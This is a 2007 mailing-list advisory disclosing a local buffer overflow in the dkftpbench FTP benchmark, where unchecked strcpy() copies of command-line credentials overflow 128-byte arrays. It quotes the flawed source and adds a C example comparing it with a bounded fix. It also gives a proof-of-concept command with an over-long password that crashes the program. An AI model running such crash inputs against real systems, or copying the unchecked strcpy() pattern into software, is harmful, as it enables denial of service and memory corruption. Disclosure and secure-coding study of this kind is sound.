Message-ID: <db4e96660703191232o674ce6degc6e8d7c02fbfacef@mail.gmail.com>
Date: Mon, 19 Mar 2007 20:32:27 +0100
From: starcadi <starcadi@...il.com>
To: listgrok <full-disclosure@...ts.grok.org.uk>
Subject: dkftpbench 0.45 (Platoon:init) Local buffer overflow vulnerability

Description:

dkftpbench is an FTP benchmark program inspired by SPECweb99. The
result of the benchmark is a number-of-simultaneous-users rating;
after running the benchmark properly, you have a good idea how many
simultaneous dialup clients a server can support. The target bandwidth
per client is set at 28.8 kilobits/second to model dialup users; this
is important for servers on the real Internet, which often serve
thousands of clients on only 10 MBits/sec of bandwidth.

A buffer overflow exists in the Platoon::init function: the username and
password supplied on the command line (-u and -p) are copied into the
fixed 128-byte members m_username and m_passwd with strcpy(), which
performs no length check. The server name supplied with -h is copied
with the same unchecked strcpy().
source: http://www.kegel.com/dkftpbench/

Source error:

in main():
--
int main(int argc, char **argv)
{
	[..]
	const char *arg_username = "anonymous";
	const char *arg_password = "robouser@";

	[..]
		/* value is the rest of the same argv element ("-uNAME"),
		 * taken as-is with no length limit */
		} else if (!strncmp(argv[i], "-u", 2)) {
			arg_username = &argv[i][2];
		} else if (!strncmp(argv[i], "-p", 2)) {
			arg_password = &argv[i][2];

	[..]
	/* thePlatoon is a local of main(), so its arrays live on the stack */
	Platoon thePlatoon;
	thePlatoon.init(poller, &sked, arg_filename,
		arg_clientBandwidth, arg_minClientBandwidth, arg_mtu,
		arg_hostname, arg_portnum, arg_username, arg_password,
		local_addrs, n_local_addrs);

	[..]
}
--

in Platoon.h:
--
	/// The user name part of the URL to fetch
	char m_username[128];
	/// The password part of the URL to fetch
	char m_passwd[128];
--

in Platoon.c:
--
void Platoon::init(Poller *poller, Sked *sked, const char *filename,
	int maxBytesPerSec, int minBytesPerSec, int bytesPerRead,
	const char *servername, int port,
	const char *username, const char *passwd,
	struct sockaddr_in *local_addrs, int n_local_addrs)
{
	[..]
	m_port = port;
	m_sked = sked;
	/* unbounded copies into the 128-byte members declared in Platoon.h;
	 * any argument of 128 or more characters writes past the array */
	strcpy(m_passwd, passwd);
	strcpy(m_servername, servername);
	strcpy(m_username, username);
	m_verbosity = 0;
	m_local_addrs = local_addrs;
	[..]
}
--
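The following is an added example and not code from dkftpbench: a self-contained model of the strcpy() pattern in Platoon::init beside a bounded replacement, with the same -u/-p argument parsing as main() feeding it. The type and function names (platoon_t, init_unchecked, would_overflow, init_checked, parse_user_pass, make_pass_arg) are hypothetical; the 128-byte arrays mirror m_username[128] and m_passwd[128] from Platoon.h, and the 135-byte input mirrors the advisory's perl -e "print 'A'x135" argument.

```c
/* Added example, not dkftpbench's own code. Names are hypothetical. */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define FIELD_MAX 128   /* same size as m_username[128] / m_passwd[128] */

typedef struct {
    char username[FIELD_MAX];
    char passwd[FIELD_MAX];
} platoon_t;

/* The vulnerable pattern as it appears in Platoon::init: strcpy() copies
 * strlen(src)+1 bytes regardless of the destination size, so any argument
 * of FIELD_MAX or more characters (128 chars + NUL = 129 bytes) writes past
 * the array. Shown for comparison only; never call it with untrusted input. */
void init_unchecked(platoon_t *p, const char *user, const char *pass)
{
    strcpy(p->username, user);
    strcpy(p->passwd, pass);
}

/* Exact overflow predicate for a FIELD_MAX-byte array: the string plus its
 * terminating NUL must fit, so strlen(s) may be at most FIELD_MAX - 1. */
int would_overflow(const char *s)
{
    return strlen(s) > FIELD_MAX - 1;
}

/* Bounded replacement: reject (rather than silently truncate) anything that
 * would not fit, then copy with an explicit length including the NUL.
 * Returns 0 on success, -1 if either field is too long. */
int init_checked(platoon_t *p, const char *user, const char *pass)
{
    if (would_overflow(user) || would_overflow(pass))
        return -1;
    memcpy(p->username, user, strlen(user) + 1);
    memcpy(p->passwd, pass, strlen(pass) + 1);
    return 0;
}

/* Mirrors the -u<name> / -p<pass> handling in dkftpbench's main(), which
 * takes the value from &argv[i][2] of the same element, with the same
 * defaults, and hands the result to the checked initialiser. */
int parse_user_pass(platoon_t *p, int argc, char **argv)
{
    const char *user = "anonymous";
    const char *pass = "robouser@";
    for (int i = 1; i < argc; i++) {
        if (!strncmp(argv[i], "-u", 2))
            user = &argv[i][2];
        else if (!strncmp(argv[i], "-p", 2))
            pass = &argv[i][2];
    }
    return init_checked(p, user, pass);
}

/* Constructs "-p" followed by n copies of 'A' (the shape of the advisory's
 * proof-of-concept argument). The caller frees the result. */
char *make_pass_arg(size_t n)
{
    char *arg = malloc(n + 3);
    if (!arg)
        return NULL;
    arg[0] = '-';
    arg[1] = 'p';
    memset(arg + 2, 'A', n);
    arg[n + 2] = '\0';
    return arg;
}

int main(void)
{
    platoon_t p;
    char *bad = make_pass_arg(135);            /* 135 'A's: would overflow */
    char *ok  = make_pass_arg(FIELD_MAX - 1);  /* 127 'A's: largest that fits */
    char *argv_bad[] = { "dkftpbench", "-utest", bad };
    char *argv_ok[]  = { "dkftpbench", "-utest", ok };

    printf("135-char password: %s\n",
           parse_user_pass(&p, 3, argv_bad) == 0 ? "accepted" : "rejected");
    printf("127-char password: %s\n",
           parse_user_pass(&p, 3, argv_ok) == 0 ? "accepted" : "rejected");
    free(bad);
    free(ok);
    return 0;
}
```

The boundary matters: with a 128-byte array the largest accepted string is 127 characters, since strcpy() also writes the terminating NUL. Rejecting over-long input is preferable to strncpy()-style truncation here because a silently shortened password would simply fail authentication later with no indication of why.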

Proof of concept:

$ dkftpbench -n1 -hlocalhost -P21 -utest -p`perl -e "print 'A'x135"` -v1
 -h127.0.0.1 host name of ftp server
 -P21 port number of ftp server
 -n1 number of users
 -c1 target number of simultaneous connection attempts
 -k2 Start next connection when: 1=immediately, 2=after prev connect complete
 -t0 length of run (in seconds)
 -b3600 desired bandwidth (in bytes per second)
 -B2700 min acceptable per-client bandwidth (in bytes per second)
 -ufederico user name
 -paaaaaa[..]
 -fusenet/rec.juggling/juggling.FAQ.Z file to fetch
 -m1500 bytes per 'packet'
 -v1 verbosity
 -sp selector (p=poll, s=select, d=/dev/poll, k=kqueue, r=rtsig, f=sig-per-fd)
 -a0 use all local interfaces
Using poll()
Segmentation fault
$

-- 
.original http://intel.shacknet.nu/
~ starcadi

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
